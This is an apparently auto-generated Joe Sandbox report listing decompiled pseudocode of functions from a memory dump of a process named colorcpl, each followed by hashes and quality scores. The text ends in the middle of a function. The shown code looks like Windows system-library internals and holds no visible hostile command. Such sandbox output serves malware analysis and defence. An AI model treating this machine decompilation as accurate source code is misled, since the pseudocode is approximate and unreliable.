                                                                                                			E06E42397(intOrPtr _a4) {
                                                                                                				void* __ebx;
                                                                                                				void* __ecx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t11;
                                                                                                				void* _t19;
                                                                                                				void* _t25;
                                                                                                				void* _t26;
                                                                                                				intOrPtr _t27;
                                                                                                				void* _t28;
                                                                                                				void* _t29;
                                                                                                
                                                                                                				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                                                                                				if( *0x6f0848c != 0) {
                                                                                                					L06E3FAD0(0x6f08610);
                                                                                                					if( *0x6f0848c == 0) {
                                                                                                						E06E3FA00(0x6f08610, _t19, _t27, 0x6f08610);
                                                                                                						goto L1;
                                                                                                					} else {
                                                                                                						_push(0);
                                                                                                						_push(_a4);
                                                                                                						_t26 = 4;
                                                                                                						_t29 = E06E42581(0x6f08610, 0x6df50a0, _t26, _t27, _t28);
                                                                                                						E06E3FA00(0x6f08610, 0x6df50a0, _t27, 0x6f08610);
                                                                                                					}
                                                                                                				} else {
                                                                                                					L1:
                                                                                                					_t11 =  *0x6f08614; // 0x1
                                                                                                					if(_t11 == 0) {
                                                                                                						_t11 = E06E54886(0x6df1088, 1, 0x6f08614);
                                                                                                					}
                                                                                                					_push(0);
                                                                                                					_push(_a4);
                                                                                                					_t25 = 4;
                                                                                                					_t29 = E06E42581(0x6f08610, (_t11 << 4) + 0x6df5070, _t25, _t27, _t28);
                                                                                                				}
                                                                                                				if(_t29 != 0) {
                                                                                                					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                                                                                					 *((char*)(_t29 + 0x40)) = 0;
                                                                                                				}
                                                                                                				return _t29;
                                                                                                			}
















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 016093cd23c21461c2090eb00787098eae67d28e7ff481ec472620e687b83c19
                                                                                                • Instruction ID: 2ebc89e2dd1d9205de8b934fccd37a5a2e020cfdd1aa27aabc577d13694e0fb3
                                                                                                • Opcode Fuzzy Hash: 016093cd23c21461c2090eb00787098eae67d28e7ff481ec472620e687b83c19
                                                                                                • Instruction Fuzzy Hash: D6116B31A00301AFEBE0B63ABC84B15B6DDFB50750F195026F71297290C9B0DD40C799
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 87%
                                                                                                			E06E537F5(void* __ecx, intOrPtr* __edx) {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				signed char _t6;
                                                                                                				intOrPtr _t13;
                                                                                                				intOrPtr* _t20;
                                                                                                				intOrPtr* _t27;
                                                                                                				void* _t28;
                                                                                                				intOrPtr* _t29;
                                                                                                
                                                                                                				_t27 = __edx;
                                                                                                				_t28 = __ecx;
                                                                                                				if(__edx == 0) {
                                                                                                					E06E32280(_t6, 0x6f08550);
                                                                                                				}
                                                                                                				_t29 = E06E5387E(_t28);
                                                                                                				if(_t29 == 0) {
                                                                                                					L6:
                                                                                                					if(_t27 == 0) {
                                                                                                						E06E2FFB0(0x6f08550, _t27, 0x6f08550);
                                                                                                					}
                                                                                                					if(_t29 == 0) {
                                                                                                						return 0xc0000225;
                                                                                                					} else {
                                                                                                						if(_t27 != 0) {
                                                                                                							goto L14;
                                                                                                						}
                                                                                                						L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                                                                                						goto L11;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t13 =  *_t29;
                                                                                                					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                                                                                						L13:
                                                                                                						_push(3);
                                                                                                						asm("int 0x29");
                                                                                                						L14:
                                                                                                						 *_t27 = _t29;
                                                                                                						L11:
                                                                                                						return 0;
                                                                                                					}
                                                                                                					_t20 =  *((intOrPtr*)(_t29 + 4));
                                                                                                					if( *_t20 != _t29) {
                                                                                                						goto L13;
                                                                                                					}
                                                                                                					 *_t20 = _t13;
                                                                                                					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                                                                                					asm("btr eax, ecx");
                                                                                                					goto L6;
                                                                                                				}
                                                                                                			}












                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 795ef07f9573347ce394930d1697fb45b7ce6e343c288fe51376bbbc85ad4cc4
                                                                                                • Instruction ID: 22fadadcf8d5a1a3193c83f4cab25d613bc3744a09af42f2d429bf36e5e4af2a
                                                                                                • Opcode Fuzzy Hash: 795ef07f9573347ce394930d1697fb45b7ce6e343c288fe51376bbbc85ad4cc4
                                                                                                • Instruction Fuzzy Hash: E101D6B2D017209BC3BB8B59D940E26BBAADF85BE47275069ED55CB290E730D801C7C1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 42%
                                                                                                			E06E1C962(char __ecx) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr _t19;
                                                                                                				char _t22;
                                                                                                				intOrPtr _t26;
                                                                                                				intOrPtr _t27;
                                                                                                				char _t32;
                                                                                                				char _t34;
                                                                                                				intOrPtr _t35;
                                                                                                				intOrPtr _t37;
                                                                                                				intOrPtr* _t38;
                                                                                                				signed int _t39;
                                                                                                
                                                                                                				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                                                                				_v8 =  *0x6f0d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                                                                				_t34 = __ecx;
                                                                                                				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                                                                					_t26 = 0;
                                                                                                					E06E2EEF0(0x6f070a0);
                                                                                                					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                                                                					if(E06E9F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                                                                						L9:
                                                                                                						E06E2EB70(_t29, 0x6f070a0);
                                                                                                						_t19 = _t26;
                                                                                                						L2:
                                                                                                						_pop(_t35);
                                                                                                						_pop(_t37);
                                                                                                						_pop(_t27);
                                                                                                						return E06E5B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                                                                					}
                                                                                                					_t29 = _t34;
                                                                                                					_t26 = E06E9F1FC(_t34, _t32);
                                                                                                					if(_t26 < 0) {
                                                                                                						goto L9;
                                                                                                					}
                                                                                                					_t38 =  *0x6f070c0; // 0x0
                                                                                                					while(_t38 != 0x6f070c0) {
                                                                                                						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                                                                						_t38 =  *_t38;
                                                                                                						_v12 = _t22;
                                                                                                						if(_t22 != 0) {
                                                                                                							_t29 = _t22;
                                                                                                							 *0x6f0b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                                                                							_v12();
                                                                                                						}
                                                                                                					}
                                                                                                					goto L9;
                                                                                                				}
                                                                                                				_t19 = 0;
                                                                                                				goto L2;
                                                                                                			}



















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 50f96fc29ecd744d146d5736113c9fc7a7fe943c771440c91fa4c9feb5067a7b
                                                                                                • Instruction ID: f67506695e56e1331bb69a9a75a860f3b111b8150b9e9b60e2be380d3f61c1de
                                                                                                • Opcode Fuzzy Hash: 50f96fc29ecd744d146d5736113c9fc7a7fe943c771440c91fa4c9feb5067a7b
                                                                                                • Instruction Fuzzy Hash: 2D1125327107069FDBD0BF29CC81A6BB7E6FF88614B102228E9598B651DB61EC04C7D1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E4002D() {
                                                                                                				void* _t11;
                                                                                                				char* _t14;
                                                                                                				signed char* _t16;
                                                                                                				char* _t27;
                                                                                                				signed char* _t29;
                                                                                                
                                                                                                				_t11 = E06E37D50();
                                                                                                				_t27 = 0x7ffe0384;
                                                                                                				if(_t11 != 0) {
                                                                                                					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                				} else {
                                                                                                					_t14 = 0x7ffe0384;
                                                                                                				}
                                                                                                				_t29 = 0x7ffe0385;
                                                                                                				if( *_t14 != 0) {
                                                                                                					if(E06E37D50() == 0) {
                                                                                                						_t16 = 0x7ffe0385;
                                                                                                					} else {
                                                                                                						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                					}
                                                                                                					if(( *_t16 & 0x00000040) != 0) {
                                                                                                						goto L18;
                                                                                                					} else {
                                                                                                						goto L3;
                                                                                                					}
                                                                                                				} else {
                                                                                                					L3:
                                                                                                					if(E06E37D50() != 0) {
                                                                                                						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                					}
                                                                                                					if( *_t27 != 0) {
                                                                                                						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                                                                                							goto L5;
                                                                                                						}
                                                                                                						if(E06E37D50() != 0) {
                                                                                                							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                						}
                                                                                                						if(( *_t29 & 0x00000020) == 0) {
                                                                                                							goto L5;
                                                                                                						}
                                                                                                						L18:
                                                                                                						return 1;
                                                                                                					} else {
                                                                                                						L5:
                                                                                                						return 0;
                                                                                                					}
                                                                                                				}
                                                                                                			}









                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                • Instruction ID: 6d0be64d10048d3cccfa0c85e83da3446a879bec0514eb61043d59801e8f43fa
                                                                                                • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                • Instruction Fuzzy Hash: 7611E571A11782CFE7E2AB74D948B7937E8EB41758F0924B0DE1C876D2E328C841C654
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E06E2766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                				char _v8;
                                                                                                				void* _t22;
                                                                                                				void* _t24;
                                                                                                				intOrPtr _t29;
                                                                                                				intOrPtr* _t30;
                                                                                                				void* _t42;
                                                                                                				intOrPtr _t47;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t36 =  &_v8;
                                                                                                				if(E06E4F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                                                                                					L10:
                                                                                                					_t22 = 0;
                                                                                                				} else {
                                                                                                					_t24 = _v8 + __ecx;
                                                                                                					_t42 = _t24;
                                                                                                					if(_t24 < __ecx) {
                                                                                                						goto L10;
                                                                                                					} else {
                                                                                                						if(E06E4F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                                                                                							goto L10;
                                                                                                						} else {
                                                                                                							_t29 = _v8 + _t42;
                                                                                                							if(_t29 < _t42) {
                                                                                                								goto L10;
                                                                                                							} else {
                                                                                                								_t47 = _t29;
                                                                                                								_t30 = _a16;
                                                                                                								if(_t30 != 0) {
                                                                                                									 *_t30 = _t47;
                                                                                                								}
                                                                                                								if(_t47 == 0) {
                                                                                                									goto L10;
                                                                                                								} else {
                                                                                                									_t22 = L06E34620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				return _t22;
                                                                                                			}











                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                • Instruction ID: 01db918273919f0dfd58ec849f9b3f3390f70b30738983b62ef3eedb37e0eba6
                                                                                                • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                • Instruction Fuzzy Hash: 0B01A032710329AFCB50DE5DDC85E5777AEEB84760F141564B915DB250DA30DD01C7A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 46%
                                                                                                			E06EAC450(intOrPtr* _a4) {
                                                                                                				signed char _t25;
                                                                                                				intOrPtr* _t26;
                                                                                                				intOrPtr* _t27;
                                                                                                
                                                                                                				_t26 = _a4;
                                                                                                				_t25 =  *(_t26 + 0x10);
                                                                                                				if((_t25 & 0x00000003) != 1) {
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push( *((intOrPtr*)(_t26 + 8)));
                                                                                                					_push(0);
                                                                                                					_push( *_t26);
                                                                                                					E06E59910();
                                                                                                					_t25 =  *(_t26 + 0x10);
                                                                                                				}
                                                                                                				if((_t25 & 0x00000001) != 0) {
                                                                                                					_push(4);
                                                                                                					_t7 = _t26 + 4; // 0x4
                                                                                                					_t27 = _t7;
                                                                                                					_push(_t27);
                                                                                                					_push(5);
                                                                                                					_push(0xfffffffe);
                                                                                                					E06E595B0();
                                                                                                					if( *_t27 != 0) {
                                                                                                						_push( *_t27);
                                                                                                						E06E595D0();
                                                                                                					}
                                                                                                				}
                                                                                                				_t8 = _t26 + 0x14; // 0x14
                                                                                                				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                                                                					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                                                                				}
                                                                                                				_push( *_t26);
                                                                                                				E06E595D0();
                                                                                                				return L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                                                                			}







                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                • Instruction ID: 52596457b32902f731658c06ce49da2f4867de2c613ef1e39e86ab8eaa945811
                                                                                                • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                                • Instruction Fuzzy Hash: 9E01DE72140709FFDBA1AF25CC80EA2F76DFF44795F114125F224475A0CB22ACA1CAA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 69%
                                                                                                			E06E19080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                                				intOrPtr* _t51;
                                                                                                				intOrPtr _t59;
                                                                                                				signed int _t64;
                                                                                                				signed int _t67;
                                                                                                				signed int* _t71;
                                                                                                				signed int _t74;
                                                                                                				signed int _t77;
                                                                                                				signed int _t82;
                                                                                                				intOrPtr* _t84;
                                                                                                				void* _t85;
                                                                                                				intOrPtr* _t87;
                                                                                                				void* _t94;
                                                                                                				signed int _t95;
                                                                                                				intOrPtr* _t97;
                                                                                                				signed int _t99;
                                                                                                				signed int _t102;
                                                                                                				void* _t104;
                                                                                                
                                                                                                				_push(__ebx);
                                                                                                				_push(__esi);
                                                                                                				_push(__edi);
                                                                                                				_t97 = __ecx;
                                                                                                				_t102 =  *(__ecx + 0x14);
                                                                                                				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                                                                					_t102 = _t102 | 0x000007d0;
                                                                                                				}
                                                                                                				_t48 =  *[fs:0x30];
                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                                					_t102 = _t102 & 0xff000000;
                                                                                                				}
                                                                                                				_t80 = 0x6f085ec;
                                                                                                				E06E32280(_t48, 0x6f085ec);
                                                                                                				_t51 =  *_t97 + 8;
                                                                                                				if( *_t51 != 0) {
                                                                                                					L6:
                                                                                                					return E06E2FFB0(_t80, _t97, _t80);
                                                                                                				} else {
                                                                                                					 *(_t97 + 0x14) = _t102;
                                                                                                					_t84 =  *0x6f0538c; // 0xe5c1d0
                                                                                                					if( *_t84 != 0x6f05388) {
                                                                                                						_t85 = 3;
                                                                                                						asm("int 0x29");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						asm("int3");
                                                                                                						_push(0x2c);
                                                                                                						_push(0x6eef6e8);
                                                                                                						E06E6D0E8(0x6f085ec, _t97, _t102);
                                                                                                						 *((char*)(_t104 - 0x1d)) = 0;
                                                                                                						_t99 =  *(_t104 + 8);
                                                                                                						__eflags = _t99;
                                                                                                						if(_t99 == 0) {
                                                                                                							L13:
                                                                                                							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                							if(__eflags == 0) {
                                                                                                								E06EE88F5(_t80, _t85, 0x6f05388, _t99, _t102, __eflags);
                                                                                                							}
                                                                                                						} else {
                                                                                                							__eflags = _t99 -  *0x6f086c0; // 0xe207b0
                                                                                                							if(__eflags == 0) {
                                                                                                								goto L13;
                                                                                                							} else {
                                                                                                								__eflags = _t99 -  *0x6f086b8; // 0x0
                                                                                                								if(__eflags == 0) {
                                                                                                									goto L13;
                                                                                                								} else {
                                                                                                									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                                                                									__eflags =  *((char*)(_t59 + 0x28));
                                                                                                									if( *((char*)(_t59 + 0x28)) == 0) {
                                                                                                										E06E32280(_t99 + 0xe0, _t99 + 0xe0);
                                                                                                										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                                                                										__eflags =  *((char*)(_t99 + 0xe5));
                                                                                                										if(__eflags != 0) {
                                                                                                											E06EE88F5(0x6f085ec, _t85, 0x6f05388, _t99, _t102, __eflags);
                                                                                                										} else {
                                                                                                											__eflags =  *((char*)(_t99 + 0xe4));
                                                                                                											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                                                                												 *((char*)(_t99 + 0xe4)) = 1;
                                                                                                												_push(_t99);
                                                                                                												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                                                                												E06E5AFD0();
                                                                                                											}
                                                                                                											while(1) {
                                                                                                												_t71 = _t99 + 8;
                                                                                                												 *(_t104 - 0x2c) = _t71;
                                                                                                												_t80 =  *_t71;
                                                                                                												_t95 = _t71[1];
                                                                                                												 *(_t104 - 0x28) = _t80;
                                                                                                												 *(_t104 - 0x24) = _t95;
                                                                                                												while(1) {
                                                                                                													L19:
                                                                                                													__eflags = _t95;
                                                                                                													if(_t95 == 0) {
                                                                                                														break;
                                                                                                													}
                                                                                                													_t102 = _t80;
                                                                                                													 *(_t104 - 0x30) = _t95;
                                                                                                													 *(_t104 - 0x24) = _t95 - 1;
                                                                                                													asm("lock cmpxchg8b [edi]");
                                                                                                													_t80 = _t102;
                                                                                                													 *(_t104 - 0x28) = _t80;
                                                                                                													 *(_t104 - 0x24) = _t95;
                                                                                                													__eflags = _t80 - _t102;
                                                                                                													_t99 =  *(_t104 + 8);
                                                                                                													if(_t80 != _t102) {
                                                                                                														continue;
                                                                                                													} else {
                                                                                                														__eflags = _t95 -  *(_t104 - 0x30);
                                                                                                														if(_t95 !=  *(_t104 - 0x30)) {
                                                                                                															continue;
                                                                                                														} else {
                                                                                                															__eflags = _t95;
                                                                                                															if(_t95 != 0) {
                                                                                                																_t74 = 0;
                                                                                                																 *(_t104 - 0x34) = 0;
                                                                                                																_t102 = 0;
                                                                                                																__eflags = 0;
                                                                                                																while(1) {
                                                                                                																	 *(_t104 - 0x3c) = _t102;
                                                                                                																	__eflags = _t102 - 3;
                                                                                                																	if(_t102 >= 3) {
                                                                                                																		break;
                                                                                                																	}
                                                                                                																	__eflags = _t74;
                                                                                                																	if(_t74 != 0) {
                                                                                                																		L49:
                                                                                                																		_t102 =  *_t74;
                                                                                                																		__eflags = _t102;
                                                                                                																		if(_t102 != 0) {
                                                                                                																			_t102 =  *(_t102 + 4);
                                                                                                																			__eflags = _t102;
                                                                                                																			if(_t102 != 0) {
                                                                                                																				 *0x6f0b1e0(_t74, _t99);
                                                                                                																				 *_t102();
                                                                                                																			}
                                                                                                																		}
                                                                                                																		do {
                                                                                                																			_t71 = _t99 + 8;
                                                                                                																			 *(_t104 - 0x2c) = _t71;
                                                                                                																			_t80 =  *_t71;
                                                                                                																			_t95 = _t71[1];
                                                                                                																			 *(_t104 - 0x28) = _t80;
                                                                                                																			 *(_t104 - 0x24) = _t95;
                                                                                                																			goto L19;
                                                                                                																		} while (_t74 == 0);
                                                                                                																		goto L49;
                                                                                                																	} else {
                                                                                                																		_t82 = 0;
                                                                                                																		__eflags = 0;
                                                                                                																		while(1) {
                                                                                                																			 *(_t104 - 0x38) = _t82;
                                                                                                																			__eflags = _t82 -  *0x6f084c0;
                                                                                                																			if(_t82 >=  *0x6f084c0) {
                                                                                                																				break;
                                                                                                																			}
                                                                                                																			__eflags = _t74;
                                                                                                																			if(_t74 == 0) {
                                                                                                																				_t77 = E06EE9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                                                                																				__eflags = _t77;
                                                                                                																				if(_t77 == 0) {
                                                                                                																					_t74 = 0;
                                                                                                																					__eflags = 0;
                                                                                                																				} else {
                                                                                                																					_t74 = _t77 + 0xfffffff4;
                                                                                                																				}
                                                                                                																				 *(_t104 - 0x34) = _t74;
                                                                                                																				_t82 = _t82 + 1;
                                                                                                																				continue;
                                                                                                																			}
                                                                                                																			break;
                                                                                                																		}
                                                                                                																		_t102 = _t102 + 1;
                                                                                                																		continue;
                                                                                                																	}
                                                                                                																	goto L20;
                                                                                                																}
                                                                                                																__eflags = _t74;
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                													break;
                                                                                                												}
                                                                                                												L20:
                                                                                                												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                                                                												 *((char*)(_t99 + 0xe5)) = 1;
                                                                                                												 *((char*)(_t104 - 0x1d)) = 1;
                                                                                                												goto L21;
                                                                                                											}
                                                                                                										}
                                                                                                										L21:
                                                                                                										 *(_t104 - 4) = 0xfffffffe;
                                                                                                										E06E1922A(_t99);
                                                                                                										_t64 = E06E37D50();
                                                                                                										__eflags = _t64;
                                                                                                										if(_t64 != 0) {
                                                                                                											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                										} else {
                                                                                                											_t67 = 0x7ffe0386;
                                                                                                										}
                                                                                                										__eflags =  *_t67;
                                                                                                										if( *_t67 != 0) {
                                                                                                											_t67 = E06EE8B58(_t99);
                                                                                                										}
                                                                                                										__eflags =  *((char*)(_t104 - 0x1d));
                                                                                                										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                                                                											__eflags = _t99 -  *0x6f086c0; // 0xe207b0
                                                                                                											if(__eflags != 0) {
                                                                                                												__eflags = _t99 -  *0x6f086b8; // 0x0
                                                                                                												if(__eflags == 0) {
                                                                                                													_t94 = 0x6f086bc;
                                                                                                													_t87 = 0x6f086b8;
                                                                                                													goto L27;
                                                                                                												} else {
                                                                                                													__eflags = _t67 | 0xffffffff;
                                                                                                													asm("lock xadd [edi], eax");
                                                                                                													if(__eflags == 0) {
                                                                                                														E06E19240(_t80, _t99, _t99, _t102, __eflags);
                                                                                                													}
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t94 = 0x6f086c4;
                                                                                                												_t87 = 0x6f086c0;
                                                                                                												L27:
                                                                                                												E06E49B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										goto L13;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						return E06E6D130(_t80, _t99, _t102);
                                                                                                					} else {
                                                                                                						 *_t51 = 0x6f05388;
                                                                                                						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                                                                						 *_t84 = _t51;
                                                                                                						 *0x6f0538c = _t51;
                                                                                                						goto L6;
                                                                                                					}
                                                                                                				}
                                                                                                			}

                                                                                                0x00000000
                                                                                                0x06e190d8
                                                                                                0x06e190cf

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf7aed04235853f26057921434521273f6353ea5573f3126da1f08153c89f295
                                                                                                • Instruction ID: 156d305303ca8a99803d4ede907530d8605c12ab3460c7fc599edc307dab10b7
                                                                                                • Opcode Fuzzy Hash: bf7aed04235853f26057921434521273f6353ea5573f3126da1f08153c89f295
                                                                                                • Instruction Fuzzy Hash: C901F4729113048FE3948F18DD40B2277BAFB45324F216026E2168F692D3B1DC41DFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 86%
                                                                                                			E06EE4015(signed int __eax, signed int __ecx) {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				signed char _t10;
                                                                                                				signed int _t28;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t28 = __ecx;
                                                                                                				asm("lock xadd [edi+0x24], eax");
                                                                                                				_t10 = (__eax | 0xffffffff) - 1;
                                                                                                				if(_t10 == 0) {
                                                                                                					_t1 = _t28 + 0x1c; // 0x1e
                                                                                                					E06E32280(_t10, _t1);
                                                                                                					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                					E06E32280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x6f086ac);
                                                                                                					E06E1F900(0x6f086d4, _t28);
                                                                                                					E06E2FFB0(0x6f086ac, _t28, 0x6f086ac);
                                                                                                					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                                                                					E06E2FFB0(0, _t28, _t1);
